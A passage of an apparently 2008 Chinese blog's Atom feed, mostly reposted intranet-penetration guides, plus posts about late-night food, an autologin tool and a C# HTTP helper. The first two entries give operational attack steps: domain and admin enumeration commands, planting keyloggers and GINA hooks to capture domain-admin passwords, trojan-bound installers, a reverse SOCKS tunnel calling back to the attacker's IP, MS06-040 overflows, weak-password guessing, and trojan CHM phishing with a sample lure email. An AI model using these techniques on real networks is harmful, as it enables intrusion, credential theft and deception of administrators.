;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <br/>\\AUGTCHIEN&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <br/>\\AVSERVER&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <br/>\\BENLEE01&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br/>\\BENSON-NB&nbsp;&nbsp; <br/>…<br/>先用net view查看内网的情况,列出的机器就是在网络结构中有联系的机器，但不一定都在一个网段，所以ping出这些机器的ip，以便分析大概有哪些网段.<br/>3.了解本机在网络中所占的角色<br/>先ipconfig /all看下是否在域中，如图：<br/><br/><br/><br/> 从上图，我们可以得知，存在一个域xxxx，从内网ip来看，应该还存在很多个段，内网很大。我们ping 一下域xxxx，得到域服务器的ip.<br/>我们再来看一下本机在域里面的角色,如图:<br/><br/>net localgroup administrators<br/><br/><br/>看来只是一个普通域用户.我们再来查看一下域里面的用户.如图：<br/><br/>net user /domain<br/><br/>域里面的用户很多，那么我们再查看一下域管理员有哪些：<br/><br/>net group &#34;domain admins&#34; /domain<br/> <br/>从上面我们掌握了内网的大概信息。下面我们进一步利用这些信息。<br/>二.信息的利用：<br/>1． 首先是内网占据的这台机器，要做几个必要的措施：1）种键盘记录，记录其可能登录的密码，有用的。2)抓hash跑密码，主要查看密码规则是否有规律，它的密码也可以去试下其它机器的密码，看是否通用。3）种gina，这一步主要不是记录当前用户的密码，而是为了来记录域管理员的登录密码，因为域管理员是有权限登录下面每台用户的机器的，gina是可以记到的，记到域管理密码后，内网在域中的机器就可以全部控制了。4）给占据机器上的备用安装文件或是备用驱动上绑马，此是为了防止对方重装机器，马就掉了。<br/>2． 反弹socks代理。<br/>在内网渗透中，反弹socks代理是很必要的，大家都知道用lcx来转发端口，好像很少看到有人是直接反弹代理来连接。因为我们要连接内网的其它机器，我们不可能一个一个的去中转端口连接，在当前控制的机器上开代理也没办法，因为对方在内网。所以我们就用反弹代理的方式。这种方式其实大家都明白。<br/><br/>首先在本机监听：<br/>c:\&gt;hd -s -listen 53 1180<br/>[+] Listening ConnectBack Port 53 ......<br/>[+] Listen OK!<br/>[+] Listening Socks5 Agent Port 1180 ......<br/>[+] Listen2 OK!<br/>[+] Waiting for MainSocket on port:53 ......<br/>此命令是将连接进来的53端口的数据包连接到1180端口。<br/> <br/>在对方机器上运行:<br/> <br/>C:\RECYCLER&gt;hd -s -connect x.x.x.x 53<br/>[+] MainSocket Connect to x.x.x.x:53 Success!<br/>[+] Send Main Command ok!<br/>[+] Recv Main Command ok!<br/>[+] Send Main Command again ok!<br/>上面的x.x.x.x为你的外网ip，下面为你接收到反弹回来的代理显示的情况。<br/>c:\&gt;hd -s -listen 53 1180<br/>[+] Listening ConnectBack Port 53 ......<br/>[+] Listen OK!<br/>[+] Listening Socks5 Agent Port 1180 ......<br/>[+] Listen2 OK!<br/>[+] Waiting for MainSocket on port:53 ......<br/>[+] Recv Main Command Echo ok!<br/>[+] Send Main Command Echo ok!<br/>[+] Recv Main Command Echo again ok!<br/>[+] Get a MainSocket on port 53 from x.x.x.x ......<br/>[+] Waiting Client on Socks5 Agent Port:1180....<br/> <br/>上面ok了，接下来在你本机安装sockscap，照下图设置就ok了。<br/><br/>Sockscap设置在控制台的”文件”-“设置”里，控制台可以将你需要代理的程序放在上面，直接拖进去即可，控制台机的程序就可以进接连接内网的机器了。如直接用mstsc连接内网其它机器的3389,就可以上去试密码或是登录管理，也可以用mssql连接内网的1433，尝试sa弱口令等。总之反弹socks是你利用已控制的内网机器通向内网其它机器的一道桥梁。<br/> <br/>三．思考：<br/>&nbsp;&nbsp; 信息有了，通道有了，接下来我们怎么做？<br/>1． 内网溢出,通过对内网的扫描情况，判断win2000的机器，利用ms06040进行运程溢出。<br/>2． 内网web，通过内网的扫描，用sockscap上的ie来打开内网开放的web，在内网采用web注入或上传的方式来获取webshell提权。<br/>3． 内网弱口令试探，利用ipc,或是3389，和已掌握的密码信息来尝试猜解内网nt的密码，当然这需要耐心，也是非常有用的。<br/><br/>4． 猜解sql弱口令，在sockscap控制台中用sql连接器连接内网开放1433或是3306的机器，猜解弱口令。<br/>5． 内网嗅探，不得已的办法，不推荐。<br/>6． 内网主动会话劫持，篇幅长，难度高，下次详写。<br/>四．突破：<br/>突破是考验经验和思维的时候，利用已掌握的信息去突破面临的困难。如，如何拿到第一台内网服务器站稳脚；如何拿到内网到外网授权的机器；如何拿到外网密码。<br/>在内网中站稳脚后，迅速判断管理员机器，控制管理员的机器极为重要。一般从机器名可以看出管理员机器，管理员的机器名常为：andy 、admin 、peter、 kater，在域控的环境中，我们只要得到域控密码就可以直接用ipc连接管理员机器种马。不是域控的环境中，我们也可以在内网测试服务器中跑出服务器的密码进而拿去尝试管理员的密码。<br/>在突破过程中，内网的数据库和web的分析很重要，数据库里面有很多有用的信息，web的数据库连接及作用也有助于进一步的分析。总之在这一过程中只有灵活运用，发散思维才可以进一步的突破和控制。<br/> <br/> <br/>黑客与安全是一个矛盾话题，只有知已知彼才能更好地维护内网安全。以上是黑客常用的内网渗透手法，知识有限，文笔粗拙，高手笑过，此文仅供新手科普。<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;By rose of ncph]]></summary>
	  <link rel="alternate" type="text/html" href="http://iamkane.com/article.asp?id=226" /> 
	  <id>http://iamkane.com/default.asp?id=226</id>
  </entry>	
		
  <entry>
	  <title type="html"><![CDATA[[转]内网渗透--如何打开突破口]]></title>
	  <author>
		 <name>Kane</name>
		 <uri>http://iamkane.com/</uri>
		 <email>kaneyau@msn.com</email>
	  </author>
	  <category term="" scheme="http://iamkane.com/default.asp?cateID=3" label="Security" /> 
	  <updated>2008-07-22T07:19:51+08:00</updated>
	  <published>2008-07-22T07:19:51+08:00</published>
		  <summary type="html"><![CDATA[内网渗透的思想是源于特洛伊木马的思想---堡垒最容易从内部攻破，一个大型的网站，一个大型的公司，一个大型的目标，在外肉，管理员总会千方百计的加强防范和修补漏洞，常规的方法进去几乎是不可能。<br/>内网渗透的突破口是我们如何得到一个内网的个人机或是内网的服务器，我个人的经验有三种，一是从外网分站渗透到内网，二是发木马信得到内网机器，三是利用取得信任得到内网机器。<br/><br/>一、从外网分站渗透到内网<br/>&nbsp;&nbsp;通常一个大的站点都有很多分站，有很多我们未知的分站或是未知的站点目录，越大的站点展现在我们面前的机会就越多，可以利用传统手法得到一个分站的服务器权限，比如注入，猜解，溢出等。得到分站服务器的情况下有两种思想：一是通过分站渗到主站或是其它分站，需要它们分配有一个内网并没划分vlan的情况，这时可以通过取得密码或是内网嗅探等方式取得更多的分站。二是通过分站服务器的分析，诱使管理员中马，比如在分站服务器取得管理员的密码，收集分站上的邮箱信息，查看分站服务器的ftp信息，收集管理员常用的工具，或是管理员有可能下载回去的文件（通常是管理员传输工具的tools文件里）或是管理员保存在站点目录的工具。<br/><br/>二、发木马信取得内网机器<br/>&nbsp;&nbsp;这应该算是一种社会工程学与漏洞的结合，比如0day，也就是word或是pdf或是ie0day发挥作用的地方。很多人拿到ie0day是直接用于挂马，其实ie0day发信的价值更高，如何欺骗管理员点击你发的邮件里的url链接也是一种艺术。也可以想想，涉及到他网站的问题，他产品的问题，这样的东西管理员总会点击的，要考虑到管理员点击后会百分之百的中这是一个技术性问题。常规的木马信发送过程中，chm的木马用得更多，因为不被杀，命中率可达百分之百，然后就要考虑到管理员会打开么？即使是客服机器中马也一样的非常有用。比如我在一次木马信的发送中，使用的附件是打包的chm，信的内网是：“ 使用你们的xx后，我觉得相当不错，不过在使用过程中发现一些bug，不知道是我的机器问题还是你们这方面没有考虑到，具体信息我以图文形式保存在附件中。”当然要找到目标的邮件地址，这个在网站上或是google中很容易找到的。<br/><br/>三、利用取得信任得到内网机器<br/>　网站管理员或是客服，都会有email或是msn或是QQ，或是现实中的人，我们可以慢慢的套近乎，抓住他的弱点，或是心理，比如他喜欢的东西，慢慢跟他聊天，降低他的心理防线，在成熟的时候发送url，或是打包的软件里捆绑木马，也不是不可以的。具体的涉及到社会工程学方面，主要看自己怎么去发挥。<br/><br/><br/>内网渗透-----如何打开突破口，这只是平时的一些经验总结，没有具体的步骤，只有一种思想，黑站已经不是一种单纯的玩注入的时代。过段时间将再写《内网渗透-----基本手法》，仅仅做技术上的探讨与分享。 <br/>(转载请注明出处<a href="http://www.ncph.net" target="_blank" rel="external">http://www.ncph.net</a>)<br/>]]></summary>
	  <link rel="alternate" type="text/html" href="http://iamkane.com/article.asp?id=225" /> 
	  <id>http://iamkane.com/default.asp?id=225</id>
  </entry>	
		
  <entry>
	  <title type="html"><![CDATA[第一次凌晨深夜在M记吃薯饼]]></title>
	  <author>
		 <name>Kane</name>
		 <uri>http://iamkane.com/</uri>
		 <email>kaneyau@msn.com</email>
	  </author>
	  <category term="" scheme="http://iamkane.com/default.asp?cateID=7" label="MyLife" /> 
	  <updated>2008-07-20T00:38:27+08:00</updated>
	  <published>2008-07-20T00:38:27+08:00</published>
		  <summary type="html"><![CDATA[<p>&#160;</p>  <p>平常都是要早餐才有薯饼吃，今次竟然可以在吃宵夜的时候吃到薯饼。哈哈..</p>  <p><a href="http://iamkane.com/attachments/month_0807/u200872003753.jpg"><img style="border-right: 0px; border-top: 0px; border-left: 0px; border-bottom: 0px" height="244" alt="200807180424_011" src="http://iamkane.com/attachments/month_0807/s20087200382.jpg" width="184" border="0" /></a>&#160;</p>  <p>&#160;</p>  <p>&#160;<a href="http://iamkane.com/attachments/month_0807/i200872003810.jpg"><img style="border-right: 0px; border-top: 0px; border-left: 0px; border-bottom: 0px" height="244" alt="200807180424_012" src="http://iamkane.com/attachments/month_0807/4200872003813.jpg" width="184" border="0" /></a> </p>  <p><a href="http://iamkane.com/attachments/month_0807/q200872003816.jpg"><img style="border-right: 0px; border-top: 0px; border-left: 0px; border-bottom: 0px" height="244" alt="200807180423_010" src="http://iamkane.com/attachments/month_0807/r200872003819.jpg" width="184" border="0" /></a> </p>  <p>&#160;</p>  <p>后面有个钟证明嘎. 哈哈</p>]]></summary>
	  <link rel="alternate" type="text/html" href="http://iamkane.com/article.asp?id=224" /> 
	  <id>http://iamkane.com/default.asp?id=224</id>
  </entry>	
		
  <entry>
	  <title type="html"><![CDATA[无聊开发综合挂机软件]]></title>
	  <author>
		 <name>Kane</name>
		 <uri>http://iamkane.com/</uri>
		 <email>kaneyau@msn.com</email>
	  </author>
	  <category term="" scheme="http://iamkane.com/default.asp?cateID=5" label="MyArticle" /> 
	  <updated>2008-07-19T05:57:51+08:00</updated>
	  <published>2008-07-19T05:57:51+08:00</published>
		  <summary type="html"><![CDATA[Autohook <br/><br/><img src="http://iamkane.com/attachments/month_0807/9200871955634.jpg" border="0" alt=""/><br/><br/>这次挂机强大D,支持 AG,SIC 和其他网站<br/><br/>暂时写到自动登陆和keeplive。可以正常挂机。<br/><br/>后来DC也加入。 呵呵..&nbsp;&nbsp;这个是他的版本<br/><br/><img src="http://iamkane.com/attachments/month_0807/c20087196020.jpg" border="0" alt=""/><br/>]]></summary>
	  <link rel="alternate" type="text/html" href="http://iamkane.com/article.asp?id=220" /> 
	  <id>http://iamkane.com/default.asp?id=220</id>
  </entry>	
		
  <entry>
	  <title type="html"><![CDATA[C# WinForm Post 公用类]]></title>
	  <author>
		 <name>Kane</name>
		 <uri>http://iamkane.com/</uri>
		 <email>kaneyau@msn.com</email>
	  </author>
	  <category term="" scheme="http://iamkane.com/default.asp?cateID=4" label=".Net" /> 
	  <updated>2008-07-19T05:44:33+08:00</updated>
	  <published>2008-07-19T05:44:33+08:00</published>
		  <summary type="html"><![CDATA[<div class="csharpcode">   <pre class="alt"><span class="lnum">   1:  </span><span class="rem">/// &lt;summary&gt;</span></pre>

  <pre><span class="lnum">   2:  </span>        <span class="rem">/// 通用获取数据POST+GET</span></pre>

  <pre class="alt"><span class="lnum">   3:  </span>        <span class="rem">/// &lt;/summary&gt;</span></pre>

  <pre><span class="lnum">   4:  </span>        <span class="rem">/// &lt;param name=&quot;url&quot;&gt;&lt;/param&gt;</span></pre>

  <pre class="alt"><span class="lnum">   5:  </span>        <span class="rem">/// &lt;param name=&quot;postData&quot;&gt;&lt;/param&gt;</span></pre>

  <pre><span class="lnum">   6:  </span>        <span class="rem">/// &lt;param name=&quot;enc&quot;&gt;&lt;/param&gt;</span></pre>

  <pre class="alt"><span class="lnum">   7:  </span>        <span class="rem">/// &lt;param name=&quot;cookie&quot;&gt;&lt;/param&gt;</span></pre>

  <pre><span class="lnum">   8:  </span>        <span class="rem">/// &lt;returns&gt;&lt;/returns&gt;</span></pre>

  <pre class="alt"><span class="lnum">   9:  </span>        <span class="kwrd">private</span> <span class="kwrd">static</span> <span class="kwrd">string</span> PGetHtml(<span class="kwrd">string</span> url, <span class="kwrd">string</span> postData, Encoding enc, CookieContainer cookie)</pre>

  <pre><span class="lnum">  10:  </span>        {</pre>

  <pre class="alt"><span class="lnum">  11:  </span>            <span class="rem">//返回的html</span></pre>

  <pre><span class="lnum">  12:  </span>            <span class="kwrd">string</span> html = String.Empty;</pre>

  <pre class="alt"><span class="lnum">  13:  </span>&#160;</pre>

  <pre><span class="lnum">  14:  </span>            <span class="kwrd">bool</span> m_UsePost = <span class="kwrd">true</span>;</pre>

  <pre class="alt"><span class="lnum">  15:  </span>&#160;</pre>

  <pre><span class="lnum">  16:  </span>            <span class="kwrd">if</span> (postData == <span class="kwrd">null</span> || postData.Length == 0)</pre>

  <pre class="alt"><span class="lnum">  17:  </span>                m_UsePost = <span class="kwrd">false</span>;</pre>

  <pre><span class="lnum">  18:  </span>&#160;</pre>

  <pre class="alt"><span class="lnum">  19:  </span>            <span class="kwrd">try</span></pre>

  <pre><span class="lnum">  20:  </span>            {</pre>

  <pre class="alt"><span class="lnum">  21:  </span>                HttpWebRequest req = (HttpWebRequest)WebRequest.Create(url);</pre>

  <pre><span class="lnum">  22:  </span>                req.UserAgent = <span class="str">&quot;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; Maxthon; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Alexa Toolbar)&quot;</span>;</pre>

  <pre class="alt"><span class="lnum">  23:  </span>                req.Method = m_UsePost ? <span class="str">&quot;POST&quot;</span> : <span class="str">&quot;GET&quot;</span>;</pre>

  <pre><span class="lnum">  24:  </span>                req.Referer = url;</pre>

  <pre class="alt"><span class="lnum">  25:  </span>                req.ContentType = <span class="str">&quot;application/x-www-form-urlencoded&quot;</span>;</pre>

  <pre><span class="lnum">  26:  </span>                req.KeepAlive = <span class="kwrd">true</span>;</pre>

  <pre class="alt"><span class="lnum">  27:  </span>                req.Accept = <span class="str">&quot;*/*&quot;</span>;</pre>

  <pre><span class="lnum">  28:  </span>&#160;</pre>

  <pre class="alt"><span class="lnum">  29:  </span>                <span class="kwrd">if</span> (cookie != <span class="kwrd">null</span>)</pre>

  <pre><span class="lnum">  30:  </span>                {</pre>

  <pre class="alt"><span class="lnum">  31:  </span>                    req.CookieContainer = cookie;</pre>

  <pre><span class="lnum">  32:  </span>                }</pre>

  <pre class="alt"><span class="lnum">  33:  </span>&#160;</pre>

  <pre><span class="lnum">  34:  </span>                <span class="kwrd">if</span> (m_UsePost)</pre>

  <pre class="alt"><span class="lnum">  35:  </span>                {</pre>

  <pre><span class="lnum">  36:  </span>                    req.ContentLength = postData.Length;</pre>

  <pre class="alt"><span class="lnum">  37:  </span>                    <span class="kwrd">using</span> (StreamWriter writer = <span class="kwrd">new</span> StreamWriter(req.GetRequestStream()))</pre>

  <pre><span class="lnum">  38:  </span>                    {</pre>

  <pre class="alt"><span class="lnum">  39:  </span>                        writer.Write(postData);</pre>

  <pre><span class="lnum">  40:  </span>                        writer.Close();</pre>

  <pre class="alt"><span class="lnum">  41:  </span>                    }</pre>

  <pre><span class="lnum">  42:  </span>                }</pre>

  <pre class="alt"><span class="lnum">  43:  </span>&#160;</pre>

  <pre><span class="lnum">  44:  </span>                HttpWebResponse resp = (HttpWebResponse)req.GetResponse();</pre>

  <pre class="alt"><span class="lnum">  45:  </span>                <span class="kwrd">if</span> (cookie != <span class="kwrd">null</span>)</pre>

  <pre><span class="lnum">  46:  </span>                {</pre>

  <pre class="alt"><span class="lnum">  47:  </span>                    resp.Cookies = cookie.GetCookies(<span class="kwrd">new</span> Uri(url));</pre>

  <pre><span class="lnum">  48:  </span>                }</pre>

  <pre class="alt"><span class="lnum">  49:  </span>&#160;</pre>

  <pre><span class="lnum">  50:  </span>&#160;</pre>

  <pre class="alt"><span class="lnum">  51:  </span>                StreamReader sr = <span class="kwrd">new</span> StreamReader(resp.GetResponseStream(), enc);</pre>

  <pre><span class="lnum">  52:  </span>                html = sr.ReadToEnd();</pre>

  <pre class="alt"><span class="lnum">  53:  </span>                sr.Close();</pre>

  <pre><span class="lnum">  54:  </span>                resp.Close();</pre>

  <pre class="alt"><span class="lnum">  55:  </span>            }</pre>

  <pre><span class="lnum">  56:  </span>            <span class="kwrd">catch</span> (Exception ex)</pre>

  <pre class="alt"><span class="lnum">  57:  </span>            {</pre>

  <pre><span class="lnum">  58:  </span>                html = ex.ToString();</pre>

  <pre class="alt"><span class="lnum">  59:  </span>            }</pre>

  <pre><span class="lnum">  60:  </span>&#160;</pre>

  <pre class="alt"><span class="lnum">  61:  </span>            <span class="kwrd">return</span> html;</pre>

  <pre><span class="lnum">  62:  </span>        }</pre>
</div>
<style type="text/css">
.csharpcode, .csharpcode pre
{
	font-size: small;
	color: black;
	font-family: consolas, "Courier New", courier, monospace;
	background-color: #ffffff;
	/*white-space: pre;*/
}
.csharpcode pre { margin: 0em; }
.csharpcode .rem { color: #008000; }
.csharpcode .kwrd { color: #0000ff; }
.csharpcode .str { color: #006080; }
.csharpcode .op { color: #0000c0; }
.csharpcode .preproc { color: #cc6633; }
.csharpcode .asp { background-color: #ffff00; }
.csharpcode .html { color: #800000; }
.csharpcode .attr { color: #ff0000; }
.csharpcode .alt 
{
	background-color: #f4f4f4;
	width: 100%;
	margin: 0em;
}
.csharpcode .lnum { color: #606060; }</style>]]></summary>
	  <link rel="alternate" type="text/html" href="http://iamkane.com/article.asp?id=219" /> 
	  <id>http://iamkane.com/default.asp?id=219</id>
  </entry>	
		
</feed>
